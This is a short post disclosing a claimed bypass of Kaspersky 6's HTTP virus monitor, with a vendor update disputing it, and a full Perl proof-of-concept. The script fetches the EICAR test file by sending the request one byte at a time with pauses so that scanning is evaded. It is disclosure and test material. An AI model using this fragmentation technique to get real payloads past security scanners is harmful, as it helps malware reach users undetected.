Kaspersky antivirus broken? No, it is not!
Update
See http://forum.kaspersky.com/index.php?s=dde13e274b2e7f67b43fe425ae8a0ecd&showtopic=14734&st=0&p=120857entry120857 for a reaction from Kaspersky (KAV): it is not broken!
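It looks like Kaspersky has made a small error in their HTTP monitor. In Kaspersky Anti-Virus 6 and Kaspersky Internet Security 6 it is possible to bypass the HTTP virus monitor. This happens because of HTTP parsing errors. john@[removespam]kak-sam.to has made some exploit code available. The script requests the EICAR anti-virus test file and sends the request one character at a time with a short pause after each, so the result shows whether the monitor inspected the download.
This Perl script can be run with ActiveState Perl 5.8: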
use IO::Socket::INET;
use strict;
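# Test harness: request the EICAR anti-virus test file over plain HTTP so that
# an HTTP-scanning product in the path can be observed either intercepting the
# download or letting it through.
# 'http(80)' is IO::Socket::INET's "service(port)" form: the service name is
# looked up first and port 80 is the fallback.
my ( $h_srv, $h_port, $h_url ) = (
    'www.eicar.com',
    'http(80)',
    'http://www.eicar.com/download/eicar.com',
);

syswrite STDOUT, "connecting to $h_srv:$h_port (for $h_url)\n";

my $s = IO::Socket::INET->new(
    PeerAddr => $h_srv,
    PeerPort => $h_port,
    Proto    => 'tcp',
);
die "socket: $!" unless $s;

# Request lines are passed without terminators; sendthem() appends the line
# terminator to each, so the trailing empty string becomes the terminator-only
# line that closes the request headers.
sendthem(
    $s,
    "GET $h_url HTTP/1.1",
    "Host: $h_srv",
    "",
);

# read_headers() yields the Content-Length (0 if none was seen), which
# read_body() uses to bound the read.
my $doc = read_body( $s, read_headers($s) );

# Print what actually arrived together with its length, so an intercepted or
# replaced response is distinguishable from the expected test file.
syswrite STDOUT, 'document is < ' . $doc . '> len=' . length($doc) . "\n";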
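# Send each request line to the peer one character at a time, then CRLF.
#   $s          - connected socket, handed on to sendone()
#   remaining @_ - request lines, without line terminators
# Prints "query N: " on STDOUT before each line; the characters themselves
# are echoed by sendone().
sub sendthem {
    my $s = shift;
    my $c = 0;
    foreach my $line (@_) {
        ++$c;
        syswrite STDOUT, "query $c: ";

        # One sendone() call per character of the line.
        foreach my $ch ( split //, $line ) {
            sendone( $s, $ch );
        }

        # HTTP line terminator: carriage return followed by line feed.
        sendone( $s, "\r" );
        sendone( $s, "\n" );
    }
}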
# Emit a single character: write it to the socket, mirror it on STDOUT, then
# pause for 300 ms.
#   $s - object providing a syswrite method (the connected socket)
#   $v - the character to send
sub sendone {
    my $sock = shift;
    my $byte = shift;

    $sock->syswrite($byte);
    syswrite STDOUT, $byte;

    # Author's note: comment out the pause below for the control case in which
    # the HTTP monitoring works. The pause is the only difference between the
    # two runs.
    # NOTE(review): a request arriving one byte at a time with long gaps is
    # itself unusual traffic; worth confirming the proxy/monitor logs it.
    select( undef, undef, undef, 0.300 );
}
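# Read the response header section line by line via read_line(), echoing each
# line to STDOUT as "header N: <line>" followed by CRLF.
#   $s - connected socket, handed on to read_line()
# Returns the numeric Content-Length value if that header was seen, else 0.
sub read_headers {
    my ($s) = @_;
    my ( $c, $cl ) = ( 0, 0 );
    for ( ;; ) {
        my $l = read_line($s);
        ++$c;
        syswrite STDOUT, "header $c: $l";
        syswrite STDOUT, "\r\n";

        # An empty line ends the header section. Compare against '' so that a
        # line consisting of "0" is not mistaken for the terminator.
        last if $l eq '';

        # Header names are case-insensitive and the whitespace after the
        # colon is optional.
        $cl = $1 if $l =~ /\AContent-Length:\s*(\d+)/i;
    }
    return $cl;
}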
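# Read one line from the socket a byte at a time.
#   $s - object providing sysread (the connected socket)
# Carriage returns are dropped and a line feed ends the line; the returned
# string contains neither. Dies with 'EOF reading headers!' when sysread
# returns a false value (end of stream or read error) before a line feed.
sub read_line {
    my ($s) = @_;
    my $str = '';
    for ( ;; ) {
        my $v = '';
        my $r = $s->sysread( $v, 1 );
        die 'EOF reading headers!' unless $r;
        last if $v eq "\n";    # LF terminates the line
        next if $v eq "\r";    # CR is skipped, so CRLF and bare LF both work
        $str .= $v;
    }
    return $str;
}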
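# Read the response body from the socket a byte at a time.
#   $s  - object providing sysread (the connected socket)
#   $cl - expected body length; a false value means "read until end of stream"
# Returns the bytes read. Stops early if sysread returns a false value.
# NOTE(review): a Content-Length of 0 is indistinguishable here from a missing
# header, so such a response is read until the peer closes the connection.
sub read_body {
    my ( $s, $cl ) = @_;
    my ( $str, $cli ) = ( '', $cl );    # $cli remembers whether a length was given
    syswrite STDOUT, "reading body ...\n";
    for ( ;; ) {
        my $v = '';
        my $r = $s->sysread( $v, 1 );
        last unless $r;
        $str .= $v;

        # Count down only when bounded; stop once the announced length is read.
        --$cl if $cli;
        last if not $cl and $cli;
    }
    return $str;
}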
